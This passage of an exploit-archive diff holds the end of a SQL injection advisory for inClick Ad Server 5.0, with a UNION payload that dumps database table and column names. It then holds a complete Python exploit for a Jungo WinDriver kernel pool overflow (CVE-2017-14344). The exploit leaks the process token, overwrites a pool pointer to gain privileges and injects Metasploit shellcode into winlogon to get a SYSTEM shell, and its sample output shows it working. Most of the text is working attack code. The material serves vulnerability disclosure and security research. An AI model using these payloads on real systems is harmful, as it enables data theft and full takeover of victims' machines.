+# Date: 12.09.2017
+# Vendor Homepage: http://www.inclick.net/
+# Software Link: http://www.inclick.net/pageid/demo.html
+# Demo: http://www.inclick.net/pageid/demo.html
+# Version: 5.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an publisher to inject sql commands....
+# 
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/client.php?pageid=sites&subpid=modify&site_id=[SQL]
+# 
+# 1-1++/*!00008UniOn*/+/*!00008sEleCT*/+0x283129,0x283229,0x283329,0x283429,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129--+-
+# 
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/windows/local/42665.py b/platforms/windows/local/42665.py
new file mode 100755
index 000000000..fdf5e9917
--- /dev/null
+++ b/platforms/windows/local/42665.py
@@ -0,0 +1,435 @@
+# -*- coding: utf-8 -*-
+"""
+Jungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability
+
+Download: http://www.jungo.com/st/products/windriver/
+File:     WD1240.EXE
+Sha1:     3527cc974ec885166f0d96f6aedc8e542bb66cba
+Driver:   windrvr1240.sys
+Sha1:     0f212075d86ef7e859c1941f8e5b9e7a6f2558ad
+CVE:      CVE-2017-14344
+Author:   Steven Seeley (mr_me) of Source Incite
+Affected: <= v12.4.0
+Thanks:   @dronesec & @FuzzySec !
+
+Summary:
+========
+
+This vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. 
+
+The specific flaw exists within the processing of IOCTL 0x95382673 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.
+
+Timeline:
+=========
+
+2017-08-22 – Verified and sent to Jungo via sales@/first@/security@/info@jungo.com
+2017-08-25 – No response from Jungo and two bounced emails
+2017-08-26 – Attempted a follow up with the vendor via website chat
+2017-08-26 – No response via the website chat
+2017-09-03 – Recieved an email from a Jungo representative stating that they are "looking into it"
+2017-09-03 – Requested a timeframe for patch development and warned of possible 0day release
+2017-09-06 – No response from Jungo
+2017-09-06 – Public 0day release of advisory
+
+Exploitation:
+=============
+
+This exploit uses a data only attack via the Quota Process Pointer Overwrite technique. We smash the token and dec a controlled address by 0x50 (size of the Mutant) to enable SeDebugPrivilege's. Then we inject code into a system process.
+
+References:
+===========
+
+- https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-wp.pdf
+- https://github.com/hatRiot/token-priv
+
+Example:
+========
+
+C:\Users\user\Desktop>whoami
+debugee\user
+
+C:\Users\user\Desktop>poc.py
+
+        --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]
+                       Steven Seeley (mr_me) of Source Incite
+
+(+) attacking WinDrvr1240 for a data only attack...
+(+) sprayed the pool!
+(+) made the pool holes!
+(+) leaked token 0xa15535a0
+(+) triggering pool overflow...
+(+) allocating pool overflow input buffer
+(+) elevating privileges!
+(+) got a handle to winlogon! 0x2bd10
+(+) allocated shellcode in winlogon @ 0xc0000
+(+) WriteProcessMemory returned: 0x1
+(+) RtlCreateUserThread returned: 0x0
+(+) popped a SYSTEM shell!
+
+C:\Users\user\Desktop>
+
+in another terminal...
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Windows\system32>whoami
+nt authority\system
+
+C:\Windows\system32>
+"""
+from ctypes import *
+from ctypes.wintypes import *
+import struct, sys, os, time, psutil
+from platform import release, architecture
+
+ntdll    = windll.ntdll
+kernel32 = windll.kernel32
+MEM_COMMIT             = 0x00001000
+MEM_RESERVE            = 0x00002000
+PAGE_EXECUTE_READWRITE = 0x00000040
+STATUS_SUCCESS              = 0x0
+STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
+STATUS_INVALID_HANDLE       = 0xC0000008
+SystemExtendedHandleInformation = 64
+
+class LSA_UNICODE_STRING(Structure):
+    """Represent the LSA_UNICODE_STRING on ntdll."""
+    _fields_ = [
+        ("Length", USHORT),
+        ("MaximumLength", USHORT),
+        ("Buffer", LPWSTR),
+    ]
+
+class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
+    """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll."""
+    _fields_ = [
+        ("Object", c_void_p),
+        ("UniqueProcessId", ULONG),
+        ("HandleValue", ULONG),
+        ("GrantedAccess", ULONG),
+        ("CreatorBackTraceIndex", USHORT),
+        ("ObjectTypeIndex", USHORT),
+        ("HandleAttributes", ULONG),
+        ("Reserved", ULONG),
+    ]
+ 
+class SYSTEM_HANDLE_INFORMATION_EX(Structure):
+    """Represent the SYSTEM_HANDLE_INFORMATION on ntdll."""
+    _fields_ = [
+        ("NumberOfHandles", ULONG),
+        ("Reserved", ULONG),
+        ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
+    ]
+
+class PUBLIC_OBJECT_TYPE_INFORMATION(Structure):
+    """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll."""
+    _fields_ = [
+        ("Name", LSA_UNICODE_STRING),
+        ("Reserved", ULONG * 22),
+    ]
+
+class PROCESSENTRY32(Structure):
+    _fields_ = [
+        ("dwSize", c_ulong),
+        ("cntUsage", c_ulong),
+        ("th32ProcessID", c_ulong),
+        ("th32DefaultHeapID", c_int),
+        ("th32ModuleID", c_ulong),
+        ("cntThreads", c_ulong),
+        ("th32ParentProcessID", c_ulong),
+        ("pcPriClassBase", c_long),
+        ("dwFlags", c_ulong),
+        ("szExeFile", c_wchar * MAX_PATH)
+    ]
+
+def signed_to_unsigned(signed):
+    """
+    Convert signed to unsigned integer.
+    """
+    unsigned, = struct.unpack ("L", struct.pack ("l", signed))
+    return unsigned
+                
+def get_type_info(handle):
+    """
+    Get the handle type information to find our sprayed objects.
+    """
+    public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()
+    size = DWORD(sizeof(public_object_type_information))
+    while True:
+        result = signed_to_unsigned(
+            ntdll.NtQueryObject(
+                handle, 2, byref(public_object_type_information), size, None))
+        if result == STATUS_SUCCESS:
+            return public_object_type_information.Name.Buffer
+        elif result == STATUS_INFO_LENGTH_MISMATCH:
+            size = DWORD(size.value * 4)
+            resize(public_object_type_information, size.value)
+        elif result == STATUS_INVALID_HANDLE:
+            return None
+        else:
+            raise x_file_handles("NtQueryObject.2", hex (result))
+
+def get_handles():
+    """
+    Return all the processes handles in the system at the time.
+    Can be done from LI (Low Integrity) level on Windows 7 x86.
+    """
+    system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()
+    size = DWORD (sizeof (system_handle_information))
+    while True:
+        result = ntdll.NtQuerySystemInformation(
+            SystemExtendedHandleInformation,
+            byref(system_handle_information),
+            size,
+            byref(size)
+        )
+        result = signed_to_unsigned(result)
+        if result == STATUS_SUCCESS:
+            break
+        elif result == STATUS_INFO_LENGTH_MISMATCH:
+            size = DWORD(size.value * 4)
+            resize(system_handle_information, size.value)
+        else:
+            raise x_file_handles("NtQuerySystemInformation", hex(result))
+
+    pHandles = cast(
+        system_handle_information.Handles,
+        POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \
+                system_handle_information.NumberOfHandles)
+    )
+    for handle in pHandles.contents:
+        yield handle.UniqueProcessId, handle.HandleValue, handle.Object
+
+def we_can_spray():
+    """
+    Spray the Kernel Pool with IoCompletionReserve and Event Objects. 
+    The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.
+    These are allocated from the Nonpaged kernel pool.
+    """
+    handles = []
+    for i in range(0, 50000):
+        handles.append(windll.kernel32.CreateMutexA(None, False, None))
+    # could do with some better validation
+    if len(handles) > 0:
+        return True
+    return False
+
+def alloc_pool_overflow_buffer(base, input_size):
+    """
+    Craft our special buffer to trigger the overflow.
+    """
+    print "(+) allocating pool overflow input buffer"
+    baseadd   = c_int(base)
+    size = c_int(input_size)
+
+    input  = struct.pack("<I", 0x0000001a)     # size
+    input += "\x44" * 0x398                    # offset to overflown chunks
+
+    priv = token + 0x40 + 0x8                  # Enabled
+    
+    # patch
+    input += struct.pack("<I", 0x040a008c)     # _POOL_HEADER
+    input += struct.pack("<I", 0xe174754d)     # _POOL_HEADER
+    input += "\x44" * 0x20
+    input += struct.pack("<I", 0x00000000)
+    input += struct.pack("<I", 0x00000001)
+    input += "\x44" * 0x20
+    input += struct.pack("<I", 0x00000001)
+    input += struct.pack("<I", 0x00000000)
+    input += "\x44" * 8
+    input += struct.pack("<I", 0x00000001)
+    input += struct.pack("<I", 0x00000001)
+    input += "\x44" * 4
+    input += struct.pack("<I", 0x0008000e)
+    input += struct.pack("<I", priv)           # Quota Process Pointer Overwrite
+
+    # filler
+    input += "\x43" * (input_size-len(input))
+    ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, 
+                                              POINTER(c_int), c_int, c_int]
+    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, 
+                                             byref(size), 
+                                             MEM_RESERVE|MEM_COMMIT,
+                                             PAGE_EXECUTE_READWRITE)
+    if dwStatus != STATUS_SUCCESS:
+        print "(-) error while allocating memory: %s" % hex(dwStatus + 0xffffffff)
+        return False
+    written = c_ulong()
+    write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))
+    if write == 0:
+        print "(-) error while writing our input buffer memory: %s" % write
+        return False
+    return True
+
+def we_can_trigger_the_pool_overflow():
+    """
+    This triggers the pool overflow vulnerability using a buffer of size 0x460.
+    """
+    GENERIC_READ  = 0x80000000
+    GENERIC_WRITE = 0x40000000
+    OPEN_EXISTING = 0x3
+    DEVICE_NAME   = "\\\\.\\WinDrvr1240"
+    dwReturn      = c_ulong()
+    driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
+    inputbuffer       = 0x41414141
+    inputbuffer_size  = 0x5000
+    outputbuffer_size = 0x5000
+    outputbuffer      = 0x20000000
+    alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size)
+    IoStatusBlock = c_ulong()
+
+    if driver_handle:
+        dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x95382673,
+                                                inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size)
+        return True
+    return False
+
+def we_can_make_pool_holes():
+    """
+    This makes the pool holes that will coalesce into a hole of size 0x460.
+    """
+    global khandlesd, to_free
+    mypid = os.getpid()
+    khandlesd = {}
+    to_free   = []
+
+    # leak kernel handles
+    for pid, handle, obj in get_handles():
+
+        # mixed object attack
+        if pid == mypid and get_type_info(handle) == "Mutant":
+            khandlesd[obj] = handle
+
+    # Find holes and make our allocation
+    holes = []
+    for obj in khandlesd.iterkeys():
+
+        # obj address is the handle address, but we want to allocation
+        # address, so we just remove the size of the object header from it.
+        alloc = obj - 0x30
+
+        # Get allocations at beginning of the page
+        if (alloc & 0xfffff000) == alloc:
+            bin = []
+            
+            # object sizes
+            Mutant_size = 0x50
+
+            # we use 0x10 since thats the left over freed chunk from filling the page
+            offset = Mutant_size + 0x10
+            for i in range(offset, offset + (0xe * Mutant_size), Mutant_size):
+
+                if (obj + i) in khandlesd:
+                    bin.append(khandlesd[obj + i])
+                    
+            # make sure it's contiguously allocated memory
+            if len(tuple(bin)) == 0xe:
+
+                # free the 2nd chunk only
+                if (obj + i + (Mutant_size * 0x2)) in khandlesd:
+                    to_free.append(khandlesd[obj + i + (Mutant_size * 0x2)])
+                holes.append(tuple(bin))
+
+    # make the holes to fill
+    for hole in holes:
+        for handle in hole:
+            kernel32.CloseHandle(handle)
+    return True
+
+def we_can_leak_token():
+    """
+    Uses NtQuerySystemInformation to leak the token
+    """
+    global token
+    hProcess = HANDLE(windll.kernel32.GetCurrentProcess())
+    hToken = HANDLE()
+    TOKEN_ALL_ACCESS = 0xf00ff
+    windll.advapi32.OpenProcessToken(hProcess,TOKEN_ALL_ACCESS, byref(hToken))
+    for pid, handle, obj in get_handles():
+        if pid==os.getpid() and get_type_info(handle) == "Token":
+            token = obj
+            return True
+    return False
+
+def trigger_lpe():
+    """
+    This function frees the IoCompletionReserve objects and this triggers the 
+    registered aexit, which is our controlled pointer to OkayToCloseProcedure.
+    """
+    # free the corrupted chunk to trigger OkayToCloseProcedure
+    # we dont know where the free chunk is, we just know its in one of the pages 
+    # full of Mutants and that its the 2nd chunk after the overflowed buffer.
+    for v in to_free:
+        kernel32.CloseHandle(v)
+
+def get_winlogin_pid():
+    for proc in psutil.process_iter():
+
+        # choose whateva system process
+        if proc.name() == "winlogon.exe":
+            return proc.pid
+    return 0
+
+def we_can_inject():
+    page_rwx_value = 0x40
+    process_all = 0x1F0FFF
+    memcommit = 0x00001000
+    process_handle = windll.kernel32.OpenProcess(process_all, False, get_winlogin_pid()) # WinLogin
+    if process_handle == 0:
+        return False
+    print "(+) got a handle to winlogon! 0x%x" % process_handle
+
+    # metasploit EXITFUNC=Thread
+    buf =  ""
+    buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
+    buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
+    buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
+    buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
+    buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
+    buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
+    buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
+    buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
+    buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
+    buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
+    buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
+    buf += "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d"
+    buf += "\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a"
+    buf += "\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53"
+    buf += "\xff\xd5\x63\x6d\x64\x2e\x65\x78\x65\x00"
+
+    shellcode_length = len(buf)
+    hThread = HANDLE()
+    memory_allocation_variable = windll.kernel32.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
+    print "(+) allocated shellcode in winlogon @ 0x%x" % memory_allocation_variable
+    res = windll.kernel32.WriteProcessMemory(process_handle, memory_allocation_variable, buf, shellcode_length, 0)
+    print "(+) WriteProcessMemory returned: 0x%x" % res
+    res = windll.ntdll.RtlCreateUserThread(process_handle, None, 0, 0, 0, 0, memory_allocation_variable, 0, byref(hThread), 0)
+    print "(+) RtlCreateUserThread returned: 0x%x" % res
+    return True
+
+def main():
+    print "\n\t--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]"
+    print "\t               Steven Seeley (mr_me) of Source Incite\r\n"
+
+    if release() != "7" or architecture()[0] != "32bit":
+        print "(-) although this exploit may work on this system,"
+        print "    it was only designed for Windows 7 x86."
+        sys.exit(-1)
+
+    print "(+) attacking WinDrvr1240 for a data only attack..."
+    if we_can_spray():
+        print "(+) sprayed the pool!"
+        if we_can_make_pool_holes():
+            print "(+) made the pool holes!"
+            if we_can_leak_token():
+                print "(+) leaked token 0x%x" % token
+                print "(+) triggering pool overflow..."
+                if we_can_trigger_the_pool_overflow():
+                    print "(+) elevating privileges!"
+                    trigger_lpe()
+                    if we_can_inject():
+                        print "(+) popped a SYSTEM shell!"
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file